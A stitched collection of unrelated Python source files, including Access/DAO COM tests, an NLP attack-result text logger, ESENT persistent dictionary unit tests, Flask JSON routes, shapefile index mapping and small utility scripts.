tab1.AddNew()
tab1.Fields("First Name").Value = "Mark"
tab1.Fields("Last Name").Value = "Hammond"
tab1.Update()
tab1.MoveFirst()
# We do a simple bookmark test which tests our optimized VT_SAFEARRAY|VT_UI1 support.
# The bookmark will be a buffer object - remember it for later.
bk = tab1.Bookmark
# Add a second record.
tab1.AddNew()
tab1.Fields("First Name").Value = "Second"
tab1.Fields("Last Name").Value = "Person"
tab1.Update()
# Reset the bookmark to the one we saved.
# But first check the test is actually doing something!
tab1.MoveLast()
if tab1.Fields("First Name").Value != "Second":
raise RuntimeError("Unexpected record is last - makes bookmark test pointless!")
tab1.Bookmark = bk
if tab1.Bookmark != bk:
raise RuntimeError("The bookmark data is not the same")
if tab1.Fields("First Name").Value != "Mark":
raise RuntimeError("The bookmark did not reset the record pointer correctly")
return dbname
def DoDumpAccessInfo(dbname):
from . import daodump
a = forms = None
try:
sys.stderr.write("Creating Access Application...\n")
a=Dispatch("Access.Application")
print("Opening database %s" % dbname)
a.OpenCurrentDatabase(dbname)
db = a.CurrentDb()
daodump.DumpDB(db,1)
forms = a.Forms
print("There are %d forms open." % (len(forms)))
# Uncommenting these lines means Access remains open.
# for form in forms:
# print " %s" % form.Name
reports = a.Reports
print("There are %d reports open" % (len(reports)))
finally:
if not a is None:
sys.stderr.write("Closing database\n")
try:
a.CloseCurrentDatabase()
except pythoncom.com_error:
pass
# Generate all the support we can.
def GenerateSupport():
# dao
gencache.EnsureModule("{00025E01-0000-0000-C000-000000000046}", 0, 4, 0)
# Access
# gencache.EnsureModule("{4AFFC9A0-5F99-101B-AF4E-00AA003F0F07}", 0, 8, 0)
gencache.EnsureDispatch("Access.Application")
def DumpAccessInfo(dbname):
amod = gencache.GetModuleForProgID("Access.Application")
dmod = gencache.GetModuleForProgID("DAO.DBEngine.35")
if amod is None and dmod is None:
DoDumpAccessInfo(dbname)
# Now generate all the support we can.
GenerateSupport()
else:
sys.stderr.write("testAccess not doing dynamic test, as generated code already exists\n")
# Now a generated version.
DoDumpAccessInfo(dbname)
def test(dbname = None):
if dbname is None:
# We need makepy support to create a database (just for the constants!)
try:
GenerateSupport()
except pythoncom.com_error:
print("*** Can not import the MSAccess type libraries - tests skipped")
return
dbname = CreateTestAccessDatabase()
print("A test database at '%s' was created" % dbname)
DumpAccessInfo(dbname)
if __name__=='__main__':
import sys
from .util import CheckClean
dbname = None
if len(sys.argv)>1:
dbname = sys.argv[1]
test(dbname)
CheckClean()
| StarcoderdataPython |
4837268 | # !/usr/bin/env python
# coding=UTF-8
"""
@Author: <NAME>
@LastEditors: <NAME>
@Description:
@Date: 2021-08-31
@LastEditTime: 2021-11-11
文本文件日志
"""
import time
import os
import logging
from typing import NoReturn, Iterable, List, Optional, Any
import terminaltables
from .base import AttackLogger
from ..misc import nlp_log_dir
from EvalBox.Attack.TextAttack.attack_result import AttackResult
class TxtLogger(AttackLogger):
"""Logs the results of an attack to a file, or `stdout`."""
__name__ = "TxtLogger"
def __init__(
self,
filename: Optional[str] = None,
stdout: bool = False,
color_method: str = "ansi",
) -> NoReturn:
""" """
super().__init__()
self.stdout = stdout
self.filename = filename or os.path.join(
nlp_log_dir, f"""{time.strftime("TxtLogger-%Y-%m-%d-%H-%M-%S.log")}"""
)
self.color_method = color_method
if not stdout:
self._clear_default_logger_handlers()
directory = os.path.dirname(self.filename)
directory = directory if directory else "."
if not os.path.exists(directory):
os.makedirs(directory)
self.fout = logging.getLogger("NLPAttack-TxtLogger")
self.fout.setLevel(level=logging.INFO)
self._init_file_handler()
self._default_logger.info(f"Logging to text file at path {self.filename}")
self._num_results = 0
self._flushed = True
@property
def num_results(self) -> int:
return self._num_results
def _init_file_handler(self) -> NoReturn:
""" """
f_handler = logging.FileHandler(self.filename)
f_handler.setLevel(logging.INFO)
f_format = logging.Formatter(
"%(asctime)s - %(name)s - %(levelname)s -\n %(message)s"
)
f_handler.setFormatter(f_format)
self.fout.addHandler(f_handler)
def __getstate__(self) -> dict:
# Temporarily save file handle b/c we can't copy it
state = {
i: self.__dict__[i]
for i in self.__dict__
if i not in ["_default_logger", "fout"]
}
return state
def __setstate__(self, state: dict) -> NoReturn:
self.__dict__ = state
if not self.stdout:
self._clear_default_logger_handlers()
self.fout = logging.getLogger("NLPAttack-TxtLogger")
self.fout.setLevel(level=logging.INFO)
self._init_file_handler()
def log_attack_result(self, result: AttackResult, **kwargs: Any) -> NoReturn:
self._num_results += 1
msg = "\n".join(
[
(" Result " + str(self.num_results)).center(110, "-"),
result.__str__(color_method=self.color_method),
]
)
self.fout.info(msg)
if self.stdout:
self._default_logger.info(msg)
self._flushed = False
def log_summary_rows(self, rows: Iterable, title: str, window_id: str) -> NoReturn:
if self.stdout:
table_rows = [[title, ""]] + rows
table = terminaltables.AsciiTable(table_rows)
self._default_logger.info(table.table)
else:
msg = "\n".join([f"{row[0]} {row[1]}" for row in rows])
self.fout.info(msg)
def flush(self) -> NoReturn:
super().flush()
for h in self.fout.handlers:
h.flush()
self._flushed = True
def close(self) -> NoReturn:
super().close()
for h in self.fout.handlers:
h.close()
self.fout.removeHandler(h)
def extra_repr_keys(self) -> List[str]:
""" """
return [
"filename",
"stdout",
"color_method",
]
| StarcoderdataPython |
8189678 | from typing import Generic, TypeVar, Iterable
import asyncio
import logging
from aioreactive.core import AsyncDisposable, AsyncCompositeDisposable
from aioreactive.core import AsyncObserver, AsyncObservable
from aioreactive.core import AsyncSingleStream, chain
log = logging.getLogger(__name__)
T = TypeVar('T')
class CatchException(AsyncObservable[T], Generic[T]):
def __init__(self, iterable) -> None:
super().__init__()
self._iterable = iter(iterable)
self._subscription = None # type: AsyncDisposable
self._task = None # type: asyncio.Future
self._stop = False
async def worker(self, observer: AsyncObserver) -> None:
def recurse(fut) -> None:
if self._stop:
log.debug("CatchException._:stop")
print("STOP")
asyncio.ensure_future(observer.aclose())
else:
log.debug("CatchException._:continue to next iterable")
print("NO STOP")
self._task = asyncio.ensure_future(self.worker(observer))
try:
source = next(self._iterable)
except StopIteration:
await observer.aclose()
except Exception as ex:
await observer.athrow(ex)
else:
self._stop = True
sink = CatchException.Stream(self)
down = await chain(sink, observer) # type: AsyncDisposable
up = await chain(source, sink)
sink.add_done_callback(recurse)
self._subscription = AsyncCompositeDisposable(up, down)
async def __asubscribe__(self, observer: AsyncObserver) -> AsyncDisposable:
async def cancel() -> None:
log.debug("CatchException._:__asubscribe__ cancel")
if self._subscription is not None:
await self._subscription.adispose()
if self._task is not None:
self._task.cancel()
self._task = asyncio.ensure_future(self.worker(observer))
return AsyncDisposable(cancel)
class Stream(AsyncSingleStream):
def __init__(self, outer):
super().__init__()
self._outer = outer
async def aclose(self) -> None:
log.debug("CatchException._:close()")
self._outer._stop = True
self.cancel()
async def athrow(self, ex: Exception) -> None:
log.debug("CatchException._:athrow()")
self._outer._stop = False
self.cancel()
def catch_exception(iterable: Iterable[T]) -> AsyncObservable[T]:
return CatchException(iterable)
| StarcoderdataPython |
8160596 | <filename>helpers/make_2D_zarr_pathology.py<gh_stars>0
import numpy as np
import zarr
from openslide import OpenSlide
slide = OpenSlide('data/camelyon16/tumor_001.tif')
file_name = 'data/camelyon16/tumor_001.zarr'
root = zarr.open_group(file_name, mode='a')
for i in range(0, 3):
print(i, 10)
shape = (slide.level_dimensions[i][0], slide.level_dimensions[i][1], 4)
z1 = root.create_dataset(str(i), shape=shape, chunks=(300, 300, None),
dtype='uint8')
# image = np.asarray(slide.read_region((0, 0), i,
# slide.level_dimensions[i])).transpose(1, 0, 2)
# z1[:] = image
for j in range(slide.level_dimensions[i][0]//1528):
print(j, slide.level_dimensions[i][0]/1528)
image = np.asarray(slide.read_region((j*1528*(2**i), 0), i,
(1528, slide.level_dimensions[i][1]))).transpose(1, 0, 2)
z1[j*1528:(j+1)*1528] = image
| StarcoderdataPython |
8122428 | from PyPDF2 import PdfFileMerger
import os
def merger(pdfs):
print(pdfs)
merger = PdfFileMerger(False)
for pdf in pdfs:
current_file = ".\\samples\\" + pdf
merger.append(current_file)
merger.write("result.pdf")
merger.close()
if __name__ == '__main__':
pdfs = os.listdir('../samples')
merger(pdfs)
| StarcoderdataPython |
5016671 | from flask import json
from isaac.models import Record
from isaac import app
# ==============================
# API DATATABLES + GLOBAL API(no-cors)
# ==============================
# этот роут использует таблица DataTables на главной странице
@app.route("/api/cat_mother")
def cat_mother():
data = {
"cat_mother": [
user.to_dict() for user in Record.query.filter(Record.category == "mother")
]
}
response = app.response_class(
response=json.dumps(data), mimetype="application/json"
)
response.headers["Access-Control-Allow-Origin"] = "*"
return response
@app.route("/api/cat_blue_baby")
def cat_chest():
data = {
"cat_blue_baby": [
user.to_dict()
for user in Record.query.filter(Record.category == "blue_baby")
]
}
response = app.response_class(
response=json.dumps(data), mimetype="application/json"
)
response.headers["Access-Control-Allow-Origin"] = "*"
return response
@app.route("/api/cat_all_chapter")
def cat_all_chapter():
data = {
"cat_all_chapter": [
user.to_dict()
for user in Record.query.filter(Record.category == "all_chapter")
]
}
response = app.response_class(
response=json.dumps(data), mimetype="application/json"
)
response.headers["Access-Control-Allow-Origin"] = "*"
return response
@app.route("/api/all_cat")
def data():
data = {"data": [user.to_dict_all() for user in Record.query]}
response = app.response_class(
response=json.dumps(data), mimetype="application/json"
)
response.headers["Access-Control-Allow-Origin"] = "*"
return response
@app.route("/api/lost")
def cat_lost():
"""Lost category"""
data = {
"cat_lost": [
user.to_dict() for user in Record.query.filter(Record.category == "lost")
]
}
response = app.response_class(
response=json.dumps(data), mimetype="application/json"
)
response.headers["Access-Control-Allow-Origin"] = "*"
return response
@app.route("/api/t_lost")
def cat_t_lost():
"""Lost category"""
data = {
"cat_t_lost": [
user.to_dict() for user in Record.query.filter(Record.category == "t_lost")
]
}
response = app.response_class(
response=json.dumps(data), mimetype="application/json"
)
response.headers["Access-Control-Allow-Origin"] = "*"
return response
| StarcoderdataPython |
9685359 | <gh_stars>10-100
import unittest
import random
import threading
import System
from System.IO import Directory
from System.IO import Path
from System.Collections.Generic import Dictionary
from System.Collections.Generic import SortedDictionary
from System.Collections.Generic import SortedList
import clr
clr.AddReferenceByPartialName('Esent.Collections')
from Microsoft.Isam.Esent.Collections.Generic import PersistentDictionary
def deleteDirectory(directory):
if Directory.Exists(directory):
Directory.Delete(directory, True)
class SingleDictionaryFixture(unittest.TestCase):
def setUp(self):
self._dataDirectory = 'SingleDictionaryFixture'
self._deleteDataDirectory()
self._dict = PersistentDictionary[System.String,System.String](self._dataDirectory)
def tearDown(self):
self._dict.Dispose()
self._deleteDataDirectory()
def _deleteDataDirectory(self):
deleteDirectory(self._dataDirectory)
def testInsertAndRetrieveRecord(self):
self._dict['key'] = 'value'
self.assertEqual(self._dict['key'], 'value')
def testLargeKey(self):
# esent may truncate the key, but we should be able to set all this data
key = 'K' * 1024*1024
self._dict[key] = 'value'
self.assertEqual(self._dict[key], 'value')
def testLargeValue(self):
value = 'V' * 1024*1024
self._dict['bigstuff'] = value
self.assertEqual(self._dict['bigstuff'], value)
def testNullKey(self):
self._dict[None] = 'value'
self.assertEqual(self._dict[None], 'value')
def testNullValue(self):
self._dict['key'] = None
self.assertEqual(self._dict['key'], None)
def testOverwriteRecord(self):
self._dict['key'] = 'value'
self._dict['key'] = 'newvalue'
self.assertEqual(self._dict['key'], 'newvalue')
def testContainsKeyReturnsFalseWhenKeyNotPresent(self):
self.assertEqual(False, self._dict.ContainsKey('key'))
def testContainsKeyReturnsTrueWhenKeyIsPresent(self):
self._dict['key'] = 'value'
self.assertEqual(True, self._dict.ContainsKey('key'))
def testRemoveRemovesKey(self):
self._dict['key'] = 'value'
self.assertEqual(True, self._dict.Remove('key'))
self.assertEqual(False, self._dict.ContainsKey('key'))
def testRemoveReturnsFalseWhenKeyNotPresent(self):
self.assertEqual(False, self._dict.Remove('key'))
def testCountIsZeroWhenDictionaryIsEmpty(self):
self.assertEqual(0, self._dict.Count)
def testCountIncreasesWithInsert(self):
self._dict['a'] = 'a'
self._dict['b'] = 'b'
self.assertEqual(2, self._dict.Count)
def testLenDecreasesWithDelete(self):
self._dict['a'] = 'a'
self._dict['b'] = 'b'
self._dict['c'] = 'c'
self._dict.Remove('b')
self.assertEqual(2, self._dict.Count)
def testClearOnEmptyDictionary(self):
self._dict.Clear()
self.assertEqual(0, self._dict.Count)
def testClearRemovesRecords(self):
self._dict['b'] = 'b'
self._dict['a'] = 'a'
self._dict.Clear()
self.assertEqual(0, self._dict.Count)
class DictionaryFixture(unittest.TestCase):
def setUp(self):
self._dataDirectory = 'DictionaryFixture'
self._deleteDataDirectory()
def tearDown(self):
self._deleteDataDirectory()
def _deleteDataDirectory(self):
deleteDirectory(self._dataDirectory)
def disposeCloseTwice(self):
dict = PersistentDictionary[System.Guid,System.Int64](self._dataDirectory)
dict.Dispose()
dict.Dispose()
def testMultipleDictionaries(self):
dict1 = PersistentDictionary[System.Int32,System.String](self._dataDirectory + '\\a')
dict2 = PersistentDictionary[System.String,System.Int32](self._dataDirectory + '\\b')
dict1[0] = 'hello'
dict2['world'] = 1
self.assertEqual('hello', dict1[0])
self.assertEqual(1, dict2['world'])
dict1.Dispose()
dict2.Dispose()
def testCloseAndReopenEmptyDictionary(self):
dict = PersistentDictionary[System.DateTime,System.UInt16](self._dataDirectory)
dict.Dispose()
dict = PersistentDictionary[System.DateTime,System.UInt16](self._dataDirectory)
self.assertEqual(0, dict.Count)
dict.Dispose()
class DictionaryComparisonFixture(unittest.TestCase):
def setUp(self):
self._dataDirectory = 'DictionaryComparisonFixture'
self._deleteDataDirectory()
self._createDictionary()
self._expected = Dictionary[System.String,System.String]()
def tearDown(self):
self._closeDictionary()
self._deleteDataDirectory()
def _createDictionary(self):
self._dict = PersistentDictionary[System.String,System.String](self._dataDirectory)
def _closeDictionary(self):
self._dict.Dispose()
def _deleteDataDirectory(self):
deleteDirectory(self._dataDirectory)
def _compareWithExpected(self):
self.assertEqual(self._expected.Count, self._dict.Count)
for k in self._expected.Keys:
self.assertEqual(self._expected[k], self._dict[k])
def _insert(self, k, v):
self._expected[k] = v
self._dict[k] = v
def _delete(self, k):
self._expected.Remove(k)
self._dict.Remove(k)
def _clear(self):
self._expected.Clear()
self._dict.Clear()
def testEmptyDb(self):
self._compareWithExpected()
def testClear(self):
for i in xrange(256):
self._insert(str(i), repr(i))
self._compareWithExpected()
self._clear()
self._compareWithExpected()
def testInserts(self):
self._insert('a', '1234')
self._insert('z', '0xF00D')
self._insert('mmmmmm', 'donuts')
self._insert('IronPython', 'rocks')
self._compareWithExpected()
def testReplaceDelete(self):
self._insert('0', '')
self._insert('1', '1111111111')
self._insert('2', '222222222')
self._insert('3', '33333333')
self._insert('4', '4444444')
self._insert('5', '555555')
self._insert('5', '555555')
self._insert('5', 'foo')
self._insert('2', 'bar')
self._delete('4')
self._compareWithExpected()
def testCloseAndOpen(self):
for i in xrange(16):
self._insert(str(i), '?' * i)
self._compareWithExpected()
self._closeDictionary()
self._createDictionary()
self._compareWithExpected()
def testKeyIsCaseInsensitive(self):
self._insert('aaa', 'foo')
self._insert('aAa', 'bar')
self._compareWithExpected()
def testKeyRespectsSpaces(self):
self._insert(' x', 'foo')
self._insert('x', 'bar')
self._insert('x ', 'baz')
self._compareWithExpected()
def testKeyRespectsSymbols(self):
self._insert('QQQ.', 'foo')
self._insert('QQQ', 'bar')
self._insert('-QQQ', 'baz')
self._compareWithExpected()
def testRandomOperations(self):
keys = '<KEY>'
for i in xrange(12000):
k = random.choice(keys) * random.randint(1,2)
if random.random() < 0.005:
self._closeDictionary()
self._createDictionary()
elif random.random() < 0.01:
self._clear()
elif random.random() < 0.20:
if k in self._expected:
self._delete(k)
else:
self._compareWithExpected()
else:
v = random.choice('XYZ#@$%*.') * random.randint(0,1024)
self._insert(k,v)
self._compareWithExpected()
class MultiThreadingFixture(unittest.TestCase):
def setUp(self):
self._dataDirectory = 'MultiThreadingFixture'
self._deleteDataDirectory()
self._dict = PersistentDictionary[System.String,System.String](self._dataDirectory)
def tearDown(self):
self._dict.Dispose()
self._deleteDataDirectory()
def _deleteDataDirectory(self):
deleteDirectory(self._dataDirectory)
def _insertRange(self, low, high):
for i in xrange(low, high):
self._dict[str(i)] = str(i)
def _deleteRange(self, low, high):
for i in xrange(low, high):
self._dict.Remove(str(i))
def _retrieveAllRecords(self, n):
"""Check that key=value for all records and there are n records"""
self.assertEqual(n, self._dict.Count)
for i in self._dict:
self.assertEqual(i.Key, i.Value)
def _randomOperations(self):
keys = '<KEY>
for i in xrange(10000):
k = random.choice(keys) * random.randint(1,8)
if random.random() < 0.10:
self._dict.Remove(k)
else:
v = '#' * random.randint(256,1024)
self._dict[k] = v
def testMultiThreadedInserts(self):
threads = [threading.Thread(target = self._insertRange, args = (x*1000, (x+1) * 1000)) for x in range(4)]
for t in threads:
t.start()
d = {}
for i in xrange(4000):
d[str(i)] = str(i)
for t in threads:
t.join()
self.assertEqual(len(d), self._dict.Count)
for k in d.keys():
self.assertEqual(d[k], self._dict[k])
def testMultiThreadedReplaces(self):
for i in xrange(4000):
self._dict[str(i)] = 'XXXX'
threads = [threading.Thread(target = self._insertRange, args = (x*1000, (x+1) * 1000)) for x in range(4)]
for t in threads:
t.start()
d = {}
for i in xrange(4000):
d[str(i)] = str(i)
for t in threads:
t.join()
self.assertEqual(len(d), self._dict.Count)
for k in d.keys():
self.assertEqual(d[k], self._dict[k])
def testMultiThreadedRetrieves(self):
n = 4000
for i in xrange(n):
self._dict[str(i)] = str(i)
threads = [threading.Thread(target = self._retrieveAllRecords, args = (n,))]
for t in threads:
t.start()
for t in threads:
t.join()
def testMultiThreadedDeletes(self):
for i in xrange(4000):
self._dict[str(i)] = str(i)
threads = [threading.Thread(target = self._deleteRange, args = (x*1000, (x+1) * 1000)) for x in range(4)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(0, self._dict.Count)
def testRandomMultiThreadedOperations(self):
threads = [threading.Thread(target = self._randomOperations) for x in range(8)]
for t in threads:
t.start()
self._dict.Clear() # try a concurrent clear
for t in threads:
t.join()
class GenericDictionaryFixtureBase(unittest.TestCase):
def _deleteDataDirectory(self):
deleteDirectory(self._dataDirectory)
def _add(self, expected, actual, k, v):
"""Add (k,v). This fails if k already exists."""
actual.Add(k,v)
expected.Add(k,v)
def _set(self, expected, actual, k, v):
"""Set k = v."""
actual[k] = v
expected[k] = v
def _remove(self, expected, actual, k):
self.assertEqual(True, actual.Remove(k))
self.assertEqual(True, expected.Remove(k))
def _clear(self, expected, actual):
actual.Clear()
expected.Clear()
def _checkKeyIsNotPresent(self, dict, k):
self.assertEqual(False, dict.Keys.Contains(k))
self.assertEqual(False, dict.ContainsKey(k))
self.assertEqual(False, dict.TryGetValue(k)[0])
self.assertEqual(False, dict.Remove(k))
def _checkDuplicateKeyError(self, dict, k, v):
self.assertRaises(System.ArgumentException, dict.Add, k, v)
def _compareDictionaries(self, expected, actual):
self.assertEqual(expected.Count, actual.Count)
self.assertEqual(expected.Keys.Count, actual.Keys.Count)
self.assertEqual(expected.Values.Count, actual.Values.Count)
for i in expected:
self.assertEqual(True, actual.Contains(i))
self.assertEqual(True, actual.ContainsKey(i.Key))
self.assertEqual(True, actual.ContainsValue(i.Value))
self.assertEqual(True, actual.Keys.Contains(i.Key))
self.assertEqual(True, actual.Values.Contains(i.Value))
(f,v) = actual.TryGetValue(i.Key)
self.assertEqual(True, f)
self.assertEqual(i.Value, v)
self.assertEqual(i.Value, actual[i.Key])
for i in actual:
self.assertEqual(True, expected.ContainsKey(i.Key))
for k in actual.Keys:
self.assertEqual(True, expected.ContainsKey(k))
for v in actual.Values:
self.assertEqual(True, expected.Values.Contains(v))
def _doTest(self, expected, actual, keys, values):
# Compare empty
self._compareDictionaries(expected, actual)
# Insert with Add()
for k in keys:
v = random.choice(values)
self._add(expected, actual, k, v)
self._compareDictionaries(expected, actual)
# Replace with []
# Make sure to try setting every value
k = random.choice(keys)
for v in values:
self._set(expected, actual, k, v)
self._compareDictionaries(expected, actual)
# Delete key, reinsert with []
k = random.choice(keys)
v = random.choice(values)
self._checkDuplicateKeyError(actual, k, v)
self._remove(expected, actual, k)
self._checkKeyIsNotPresent(actual, k)
self._compareDictionaries(expected, actual)
self._set(expected, actual, k, v)
self._compareDictionaries(expected, actual)
# for i in actual:
# print '%s => %.32s' % (i.Key, i.Value)
# Clear
self._clear(expected, actual)
self._compareDictionaries(expected, actual)
def createDictAndTest(self, tkey, tvalue):
dict = PersistentDictionary[tkey,tvalue](self._dataDirectory)
try:
expected = Dictionary[tkey,tvalue]()
self._doTest(expected, dict, data[tkey], data[tvalue])
finally:
dict.Dispose()
class GenericDictionaryFixture(GenericDictionaryFixtureBase):
def setUp(self):
self._dataDirectory = 'GenericDictionaryFixture'
self._deleteDataDirectory()
self._dict = None
def tearDown(self):
self._deleteDataDirectory()
def createDictAndTest(self, tkey, tvalue):
dict = PersistentDictionary[tkey,tvalue](self._dataDirectory)
try:
expected = Dictionary[tkey,tvalue]()
self._doTest(expected, dict, data[tkey], data[tvalue])
finally:
dict.Dispose()
class SortedGenericDictionaryFixture(GenericDictionaryFixtureBase):
def setUp(self):
self._dataDirectory = 'SortedGenericDictionaryFixture'
self._deleteDataDirectory()
self._dict = None
def tearDown(self):
self._deleteDataDirectory()
def _compareDictionaries(self, expected, actual):
super(SortedGenericDictionaryFixture, self)._compareDictionaries(expected, actual)
for x,y in zip(expected.Keys, actual.Keys):
self.assertEqual(x, y)
def createDictAndTest(self, tkey, tvalue):
dict = PersistentDictionary[tkey,tvalue](self._dataDirectory)
try:
expected = SortedDictionary[tkey,tvalue]()
self._doTest(expected, dict, data[tkey], data[tvalue])
finally:
dict.Dispose()
class SortedGenericListFixture(SortedGenericDictionaryFixture):
def setUp(self):
self._dataDirectory = 'SortedGenericListFixture'
self._deleteDataDirectory()
self._dict = None
def tearDown(self):
self._deleteDataDirectory()
def createDictAndTest(self, tkey, tvalue):
dict = PersistentDictionary[tkey,tvalue](self._dataDirectory)
try:
expected = SortedList[tkey,tvalue]()
self._doTest(expected, dict, data[tkey], data[tvalue])
finally:
dict.Dispose()
keytypes = [
System.Boolean,
System.Byte,
System.Int16,
System.UInt16,
System.Int32,
System.UInt32,
System.Int64,
System.UInt64,
System.Single,
System.Double,
System.DateTime,
System.TimeSpan,
System.Guid,
System.String,
]
nullabletypes = [
System.Boolean,
System.Byte,
System.Int16,
System.UInt16,
System.Int32,
System.UInt32,
System.Int64,
System.UInt64,
System.Single,
System.Double,
System.DateTime,
System.TimeSpan,
System.Guid,
]
valuetypes = [
System.Boolean,
System.Byte,
System.Int16,
System.UInt16,
System.Int32,
System.UInt32,
System.Int64,
System.UInt64,
System.Single,
System.Double,
System.DateTime,
System.TimeSpan,
System.Guid,
System.String,
System.Decimal,
]
r = System.Random()
data = {}
data[System.Boolean] = [
True,
False]
data[System.Byte] = [
1,
2,
System.Byte.MinValue,
System.Byte.MaxValue,
r.Next(System.Byte.MinValue, System.Byte.MaxValue)]
data[System.Int16] = [
0,
1,
-1,
System.Int16.MinValue,
System.Int16.MaxValue,
r.Next(System.Int16.MinValue, System.Int16.MaxValue)]
data[System.UInt16] = [
1,
2,
System.UInt16.MinValue,
System.UInt16.MaxValue,
r.Next(System.UInt16.MinValue, System.UInt16.MaxValue)]
data[System.Int32] = [
0,
1,
-1,
System.Int32.MinValue,
System.Int32.MaxValue,
r.Next()]
data[System.UInt32] = [
1,
2,
System.UInt32.MinValue,
System.UInt32.MaxValue,
r.Next(0, System.Int32.MaxValue)]
data[System.Int64] = [
0,
1,
-1,
System.Int64.MinValue,
System.Int64.MaxValue,
r.Next()]
data[System.UInt64] = [
1,
2,
System.UInt64.MinValue,
System.UInt64.MaxValue,
r.Next(0, System.Int32.MaxValue)]
data[System.Single] = [
0,
1,
-1,
System.Single.MinValue,
System.Single.MaxValue,
r.Next()]
data[System.Double] = [
0,
1,
-1,
System.Math.PI,
System.Double.MinValue,
System.Double.MaxValue,
r.NextDouble()]
data[System.Decimal] = [
System.Decimal.MinValue,
System.Decimal.MaxValue,
System.Decimal.MinusOne,
System.Decimal.Zero,
System.Decimal.One,
System.Decimal(r.Next()),
System.Decimal(r.NextDouble())]
data[System.Guid] = [
System.Guid.Empty,
System.Guid.NewGuid()]
data[System.DateTime] = [
System.DateTime.MinValue,
System.DateTime.MaxValue,
System.DateTime.Now,
System.DateTime.UtcNow,
System.DateTime.Today]
data[System.TimeSpan] = [
System.TimeSpan.MinValue,
System.TimeSpan.MaxValue,
System.TimeSpan.FromDays(1),
System.TimeSpan.FromHours(1),
System.TimeSpan.FromMinutes(1),
System.TimeSpan.FromSeconds(1),
System.TimeSpan.FromMilliseconds(1),
System.TimeSpan.FromTicks(1),
System.TimeSpan(r.Next())]
data[System.String] = [
System.String.Empty,
'1',
'`',
'foo',
'bar',
'baz',
'space',
'space ',
'case',
'CASE',
'punctuation',
'punctuation!',
r.Next().ToString(),
r.NextDouble().ToString(),
System.Guid.NewGuid.ToString(),
System.DateTime.Now.ToString(),
'#'*65000]
# Use this to create a unique closure for tkey and tvalue
def makef(tkey, tvalue):
return lambda self : self.createDictAndTest(tkey, tvalue)
# Make nullable data, which is the non-nullable data + None
for t in nullabletypes:
data[System.Nullable[t]] = list(data[t])
data[System.Nullable[t]].append(None)
valuetypes.append(System.Nullable[t])
# Create the test functions
for tkey in keytypes:
for tvalue in valuetypes:
name = 'test%s%s' % (tkey, tvalue)
setattr(GenericDictionaryFixture, name, makef(tkey, tvalue))
setattr(SortedGenericDictionaryFixture, name, makef(tkey, tvalue))
setattr(SortedGenericListFixture, name, makef(tkey, tvalue))
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
21152 | <reponame>darshikaf/toy-robot-simulator
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import annotations
import math
class Point:
def __init__(self, x: int = 0, y: int = 0):
self.x = x
self.y = y
def __eq__(self, other: object) -> bool:
if isinstance(other, Point):
return (self.x == other.x) and (self.y == other.y)
return NotImplemented
def __ne__(self, other: object) -> bool:
if isinstance(other, Point):
return not (self == other)
return NotImplemented
def __add__(self, other: Point) -> Point:
x = self.x + other.x
y = self.y + other.y
return self.__class__(x, y)
class Vector(Point):
def __mul__(self, scale: int) -> Vector:
x = self.x * scale
y = self.y * scale
return self.__class__(x, y)
class Rect:
def __init__(self, point1: Point, point2: Point) -> None:
self.top = max(point1.y, point2.y)
self.right = max(point1.x, point2.x)
self.bottom = min(point1.y, point2.y)
self.left = min(point1.x, point2.x)
def contains(self, point: Point) -> bool:
contains_x = (self.left <= point.x) and (point.x <= self.right)
contains_y = (self.bottom <= point.y) and (point.y <= self.top)
return contains_x and contains_y
| StarcoderdataPython |
5049574 | <filename>mapper.py
import shapefile
from spatialindex import SBN, Bin, Feature
from math import floor, ceil
def mapshapefile(sf):
# map features in a shapefile to index space
shapes = sf.shapes()
features = []
for index, shape in enumerate(shapes):
ft = mapfeature(index,shape,sf)
features.append(ft)
return features
def mapfeature(index,shape,sf):
# map individual features, returns Features
sf_xrange = sf.bbox[2]-sf.bbox[0]
sf_yrange = sf.bbox[3]-sf.bbox[1]
ft = Feature()
ft.id = index + 1
if sf.shapeType == 1:
(ptx,pty) = shape.points[0]
sh_bbox = (ptx, pty, ptx, pty)
else:
sh_bbox = shape.bbox
ft_xmin = ((sh_bbox[0]-sf.bbox[0])/sf_xrange*255.0)
# not sure why this rounding is needed, but it is
mod_xmin = (ft_xmin%1 - .005)%1 + int(ft_xmin)
ft.xmin = int(floor(mod_xmin))
if ft.xmin < 0 : ft.xmin = 0
ft_ymin = ((sh_bbox[1]-sf.bbox[1])/sf_yrange*255.0)
mod_ymin = (ft_ymin%1 - .005)%1 + int(ft_ymin)
ft.ymin = int(floor(mod_ymin))
if ft.ymin < 0 : ft.ymin = 0
ft_xmax = ((sh_bbox[2]-sf.bbox[0])/sf_xrange*255.0)
mod_xmax = (ft_xmax%1 + .005)%1 + int(ft_xmax)
ft.xmax = int(ceil(mod_xmax))
if ft.xmax > 255: ft.xmax = 255
ft_ymax = ((sh_bbox[3]-sf.bbox[1])/sf_yrange*255.0)
mod_ymax = (ft_ymax%1 + .005)%1 + int(ft_ymax)
ft.ymax = int(ceil(mod_ymax))
if ft.ymax > 255: ft.ymax = 255
return ft
if __name__ == "__main__":
file = "../cities/132"
s = shapefile.Reader(file)
sf = mapshapefile(s)
sbn = SBN(file + ".sbn")
for id, bin in enumerate(sbn.bins):
for f in bin.features:
m = sf[f.id-1]
if (f.xmin,f.xmax,f.ymin,f.ymax) != (m.xmin,m.xmax,m.ymin,m.ymax):
print "Bin %s (%s)" % (id, bin.id)
print " SBN Feature %s (%s,%s,%s,%s)" % (f.id, f.xmin, f.ymin, f.xmax, f.ymax)
print " Mapper Feature %s (%s,%s,%s,%s)\n" %(m.id, m.xmin, m.ymin, m.xmax, m.ymax)
| StarcoderdataPython |
1831284 | #!/usr/local/bin/python
import audio
audio.playNext()
audio.playNext()
audio.playNext()
audio.playNext()
| StarcoderdataPython |
3435636 | <reponame>IngoKl/quotapi
from flask import Flask, jsonify, abort, request
from termcolor import colored
import logging
import datetime
import sqlite3
import json
import random
# Quotapi v.1.1; 09.06.2016, MIT License (<NAME> 2016)
# Disable Console Output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
# Settings
logfile = './api-log.txt'
logging = True
x_forwarded_for_retrieval = True
db_connection = sqlite3.connect("quotes-clean.db3", check_same_thread=False)
def client_ip():
if x_forwarded_for_retrieval:
return request.headers.getlist("X-Forwarded-For")[0]
else:
return request.remote_addr
def dictionary_factory(cursor, row):
"""
:param cursor: the cursor object
:param row: the row
:type cursor: object
:type row: list
:return: d
"""
d = {}
